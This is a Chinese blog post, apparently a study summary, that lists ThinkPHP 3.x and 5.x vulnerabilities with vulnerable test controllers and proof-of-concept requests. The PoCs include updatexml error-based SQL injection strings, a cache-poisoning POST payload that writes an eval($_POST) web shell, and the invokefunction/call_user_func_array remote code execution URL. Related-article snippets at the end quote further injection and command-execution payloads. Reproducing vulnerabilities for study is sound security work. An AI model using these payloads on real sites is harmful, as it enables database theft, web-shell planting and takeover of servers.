php5.3.27漏洞,Thinkphp3.x/5.x系列漏洞总结学习

最新推荐文章于 2024-01-22 16:14:29 发布
最新推荐文章于 2024-01-22 16:14:29 发布
阅读量612 收藏
点赞数
文章标签: php5.3.27漏洞

ThinkPHP 漏洞列表

一、3.x

使用方法

bash

cd /var/www/tp3

ThinkPHP3.2.3_缓存函数设计缺陷可导致Getshell

标题

ThinkPHP5.0.10-3.2.3缓存函数设计缺陷可导致Getshell

时间

2017-08-09

版本

<= 3.2.3

ThinkPHP3.2.3_最新版update注入漏洞

标题

Thinkphp3.2.3最新版update注入漏洞

ThinkPHP3.2.X_find_select_delete注入

标题

thinkphp3.2 find_select_delete注入

ThinkPHP3.X_order_by注入漏洞

标题

ThinkPHP 3.X/5.X order by注入漏洞

二、5.x

使用方法

bash

cd /var/www/tp5

ThinkPHP5_SQL注入漏洞&&敏感信息泄露

测试方法

bash

git checkout 02f8e8a

测试代码

php

public function testsql()

{

$ids = input('ids/a');

$result = db('user')->where('id', 'in', $ids)->select();

var_dump($result);

}

POC

php

testsql?ids[0,updatexml(0,concat(0xa,user()),0)]=1231

结果

ca40eb6813078b49005bc3f2bf7026d6.png

ThinkPHP5.0.10-3.2.3_缓存函数设计缺陷可导致Getshell

标题

ThinkPHP5.0.10-3.2.3 缓存函数设计缺陷可导致Getshell

时间

2017-08-09

版本

< 5.0.11

测试方法

bash

git checkout 094dde5

测试代码

php

public function add()

{

$user = input('post.');

$m=db('user')->where(['id'=> 1])->insert($user);

}

public function cache()

{

$m = db('user')->select();

Cache::set('name',$m,3600);

}

POC

php

post data:

username=%2F%2F%0D%0A%24a%3Deval(%24_POST%5B%27a%27%5D)%3B%23

注:%2F%2F%0D%0A = //+回车

结果

93e5f3c3b45624a617354ee2d434ab66.png

ccbbaa742c127d5480e7eeaff7c6dd37.png

7ae2a69903a2cee59d10a180a4a17051.png

其中文件路径和名称是 b0+68931cc450442b63f5b3d276ea4297 而

md5('name') = b068931cc450442b63f5b3d276ea4297

ThinkPHP框架5.0.X_sql注入漏洞分析

标题

ThinkPHP框架 5.0.x sql注入漏洞分析

时间

2018-04-09

版本

< 5.0.16

测试方法

bash

git checkout 7c13757

测试代码

php

public function testsql()

{

$username = input('get.username/a');

db('user')->where(['id'=> 1])->insert(['username'=>$username]);

}

POC

php

testsql?username[0]=inc&username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&username[2]=1

结果

cae565b52426a8bf43e83d3ad3f8f82d.png

ThinkPHP5.X_order_by注入漏洞

标题

ThinkPHP 3.X/5.X order by注入漏洞

测试方法

bash

git checkout 35e9878

测试代码

php

public function testsql()

{

$order = input('get.order');

$m = db('user')->order($order)->find();

var_dump($m);

}

POC

php

testsql?order[id`|updatexml(1,concat(0x3a,user()),1)%23]=1

结果

ce493a1a0f5e48c06f4e2ecd77cf951e.png

ThinkPHP5.X_远程代码执行

测试方法

bash

git checkout 4fefa5e

测试代码

php

public function index()

{

//...无需实际代码

}

POC

php

index?s=index/\think\container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

结果

2d994789231831675d78fe3505bc087e.png

TCV = 1

佐罗 先生
关注
thinkPHP3.x日志泄露漏洞复现
千寻的博客
12-18 3192
漏洞名称 thinkPHP3.x日志泄露 漏洞描述 ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且debug很多网站都没有关 ThinkPHP默认安装后,也会在Runtime目录下生成日志 日志很容易被猜解到,而且日志里面有执行SQL语句的记录 影响版本 thinkPHP3.2 thinkPHP3. 漏洞分析 THINKPHP3.2 结构:Application\Runtime\Logs\Home\16_09_09.log THINKPHP3.1结构:Runti
ThinkPHP V5.0.5漏洞_ThinkPHP漏洞分析与利用
weixin_39602280的博客
11-19 2561
一、组件介绍1.1 基本信息ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,遵循Apache 2开源协议发布,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL...
Thinkphp漏洞
weixin_43873557的博客
02-06 1029
Thinkphp介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,支持 windows/Unix/Linux等服务器环境。 ➢ Thinkphp应用 很多cms就是基于thinkphp二次开发的,所以thinkphp出问题的话,会影响很多基于thinkphp开发的网站。 ➢历史漏洞 ThinkPHP3.2.3_缓存函数设计缺陷可导致Getshell ThinkPHP5_SQL注入漏洞&&敏感信息泄露 ThinkPHP3.2.3_最新版update注入漏洞 Thin
php5.3.27漏洞,CVE-2019-11043 PHP 远程代码执行漏洞
weixin_31978735的博客
03-11 551
1. 背景9 月 26 日,PHP 官方发布漏洞通告,其中指出:使用 Nginx + php-fpm 的服务器,在部分配置下,存在远程代码执行漏洞。并且该配置已被广泛使用,危害较大。漏洞 PoC 在 10 月 22 日公开,国内安全媒体及时发布了预警。2. 漏洞描述Nginx 上 fastcgi_split_path_info 在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致 PATH_...
php5.3.x 漏洞,ThinkPHP 3.X/5.X order by注入漏洞
weixin_34124963的博客
03-20 647
ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,创立于2006年初,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多的原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进,已经成长为国内最领...
php-5.3.27.tar.gz php-5.3.27安装包下载
06-27
标题中提到的"php-5.3.27.tar.gz"是PHP 5.3.27的源代码压缩包,它采用gzip压缩算法。在Linux或Unix-like系统上,你可以通过访问PHP的官方发布页或者第三方镜像站点来下载这个版本。确保下载的文件名为...
springmvc, spring5.x , hibernate5.x 整合
11-04
Spring 5.x带来了许多性能改进和新特性,如Reactor支持以实现响应式编程,以及对Java 8和Java EE 8的全面兼容。Spring框架的核心是依赖注入(DI),它允许开发者创建松耦合的组件,便于测试和维护。 Hibernate 5.x...
Error starting ApplicationContext. To display the conditions report re-run your application with 'debug' enabled. 2023-07-10 18:03:35.212 ERROR 8652 --- [ main] o.s.boot.SpringApplication : Application run failed org.springframework.context.ApplicationContextException: Failed to start bean 'documentationPluginsBootstrapper'; nested exception is java.lang.NullPointerException: Cannot invoke "org.springframework.web.servlet.mvc.condition.PatternsRequestCondition.getPatterns()" because "this.condition" is null at org.springframework.context.support.DefaultLifecycleProcessor.doStart(DefaultLifecycleProcessor.java:181) ~[spring-context-5.3.27.jar:5.3.27] at org.springframework.context.support.DefaultLifecycleProcessor.access$200(DefaultLifecycleProcessor.java:54) ~[spring-context-5.3.27.jar:5.3.27] at org.springframework.context.support.DefaultLifecycleProcessor$LifecycleGroup.start(DefaultLifecycleProcessor.java:356) ~[spring-context-5.3.27.jar:5.3.27] at java.base/java.lang.Iterable.forEach(Iterable.java:75) ~[na:na]
07-11
3. 检查你的代码,特别是与文档生成相关的注解或配置是否正确使用。 如果上述步骤没有解决问题,建议提供更多的错误日志和相关的代码片段,以便更好地帮助你解决问题。 希望这些提示能对你有所帮助!如果还有其他...
php-5.3.27v9.rar
08-21
PHP 5.3.27是该系列的一个重要版本,它在5.3.x系列中引入了多项改进和新特性,旨在提升性能、增强安全性和提供更丰富的功能支持。 在PHP 5.3.27 v9版本中,最引人注目的亮点在于它添加了对三个关键的扩展库的支持:...
spring-framework-5.3.27.zip
05-17
在压缩包"spring-framework-5.3.27.zip"中,开发者可以找到Spring Framework的所有核心模块和相关文档,包括源代码、API文档、示例代码等。这些资源可以帮助开发者深入理解Spring的工作原理,快速上手开发基于Spring...
thinkphp 5.x~3.x 文件包含漏洞分析
weixin_30256505的博客
05-11 546
漏洞描述: ThinkPHP在加载模版解析变量时存在变量覆盖的问题,且没有对$cacheFile进行相应的消毒处理,导致模板文件的路径可以被覆盖,从而导致任意文件包含漏洞的发生。 主要还是变量覆盖的问题。 漏洞范围: 漏洞影响版本:5.0.0<=ThinkPHP5<=5.0.18、5.1.0<=ThinkPHP<=5.1.10 本地复现环境: ...
10-PHP代码审计——thinkphp3.2.3 update注入漏洞
网络安全
05-06 896
实验环境的poc: http://www.tptest.com/index.php/home/index/index?username[0]=bind&username[1]=0%20and%201=(updatexml(1,concat(0x3a,(user())),1))%23&password=123456 通过更改用户密码的案例来分析update注入漏洞的过程: 在分析之前,先梳理一下漏洞利用的过程,update注入的流程是:M函数 --> where函...
[PHP] ThinkPHP3.2 order by注入分析
Y4tacker的博客
02-26 985
本篇是ThinkPHP3.2系列的最后一篇了,终于告一段落了 我首先还是放payload吧 ?username=admin&order[updatexml(1,concat(0x3a,user()),1)],当然为了复现简单写个控制器吧,这个漏洞利用点就是最后拼接sql语句的时候的parseOrder方法没有进行过滤造成的 <?php namespace Home\Controller; use Think\Controller; class IndexController extends C
寒假学习第11天--中间件漏洞--vulhub--thinkphp系列
最新发布
m0_73581247的博客
01-22 1244
例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。个人笔记,大佬勿喷,小六花祝你每天开心。
thinkphp日志泄漏漏洞_thinkPHP命令执行漏洞
weixin_39948210的博客
12-20 551
thinkPHP中反斜杠的作用是类库\命名空间命令执行的姿势通过反射invokefunction调用call_user_func_array方法,call_user_func_array函数接受两个参数,第一个为函数名,第二个为函数参数数组,如下所示,通过call_user_func_array函数调用system执行whoami函数?s=index/think\app/invokefunctio...
ThinkPHP V5.0.5漏洞_ThinkPHP 5.x 远程命令执行漏洞分析与复现
weixin_39998881的博客
11-19 580
php中文网最新课程每日17点准时技术干货分享0x00 前言ThinkPHP 官方 2018 年 12 月 9 日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的 getshell 漏洞,受影响的版本包括 5.0 和 5.1 版本,推荐尽快更新到最新版本。0x01 影响范围5....
vulhub thinkPHP5 SQL注入&&敏感信息泄露漏洞复现
weixin_53696027的博客
05-22 756
关于vulhub中thinkPHP SQL注入的漏洞复现及其简单的原理介绍
thinkphp5 漏洞原理分析合集
m0_46689007的博客
11-30 7348
跟进Request.php中method(),Config::get(‘var_method’)提权var_method中的值,var_method的又为_method,这个_method可控,我们传入’__construct’,到$this->{$this->method}($_POST);因为执行的是get方法,跟进get()方法,此方法为读取配置文件,所以我们构造的参数进入get()中就会控制读取内容,后面返回self::$config[$range][$name[0]][$name[1]]。
Thinkphp漏洞复现
qq_63980959的博客
05-19 867
其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞。在其版本 5 中,由于框架处理控制器名称不正确,如果网站未启用强制路由(这是默认设置),它可以执行任何方法,从而导致 RCE 漏洞。传入的某参数在绑定编译指令的时候又没有安全处理,预编译的时候导致SQL异常报错。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值